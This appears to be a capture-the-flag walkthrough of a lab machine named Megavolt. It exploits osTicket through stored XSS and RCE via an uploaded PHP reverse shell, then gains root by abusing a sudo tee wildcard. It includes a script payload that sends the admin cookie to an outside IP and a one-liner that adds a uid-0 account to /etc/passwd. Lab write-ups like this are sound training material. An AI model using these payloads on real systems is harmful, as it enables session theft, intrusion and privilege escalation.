Megavolt

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.183.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 13:29 +08
Nmap scan report for 192.168.183.115
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE  SERVICE
22/tcp open   ssh
80/tcp open   http

We can start proxying traffic through Burp.

OSTicket -> XSS Admin Cookie

Port 80 hosted an OSTicket instance, which has a lot of vulnerabilities and exploits:

I registered a new user and opened a ticket. When I viewed the status, it seems that an 'Alfred Smith' closes the tickets:

This confirms that a user is indeed viewing the tickets, and we can try to use an XSS exploit for it. The file upload function is vulnerable to an XSS exploit:

osTicket 1.12 - Persistent Cross-Site Scripting via File UploadExploit Database

We can upload this HTML file to steal the administrator's cookie:

<script>new Image().src='http://192.168.45.208/?cookie=' + encodeURI(document.cookie);</script>

As soon as we upload the file and submit a new ticket, we get this on a listener port:

Using this cookie, we can then login to OSTicket at /scp by changing our cookie within Burp:

OSTicket RCE

Within the settings of the Admin Panel, we can find the version of OSTicket running:

This version is vulnerable to an RCE exploit. To exploit it, we first need to enable the plugin that stores attachments within the file system of the machine:

Afterwards, in the settings, make sure to change the Attachment settings:

Then, we need to open a new ticket and upload a PHP reverse shell.

View the ticket from the Administrator account:

If we click on the attachment, it would generate a GET request to the file.php file with a key:

This is the URL key, and we need one more key which is the File key. This can be generated by doing the following:

$ php -a 
Interactive shell

php > $sha1 = base64_encode(sha1_file('shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
Y2_qPxdA2XMAeDyyloBdYykx9uE

Then, we can finally use this repository's script to trigger the shell:

GitHub - Und3r-r00t/osticket-shell: osticket upload shellGitHub

The exploit took me quite a few times before it worked. If it doesn't work, upload your shell with a different name. In my case, shell.php worked.

The script would brute force every possible directory that the PHP shell is in before executing it:

Privilege Escalation

Sudo Tee + Wildcard -> Root

We can check our sudo privileges on the machine:

bash-4.2$ sudo -l 
Matching Defaults entries for apache on megavolt:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User apache may run the following commands on megavolt:
    (ALL) NOPASSWD: /usr/bin/tee /var/log/httpd/*

Because there's a wildcard there, we can basically run tee to write to any file we want. First, generate a new password hash:

$ openssl passwd -1 hello123
$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.

Then, write this to the /etc/passwd file using this one-liner:

(cat /etc/passwd && echo 'innocent:$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.:0::/root:/bin/sh') | sudo tee /var/log/httpd/../../../../../../etc/passwd

This would add our new entry into the /etc/passwd file and we can su to become root:

Rooted!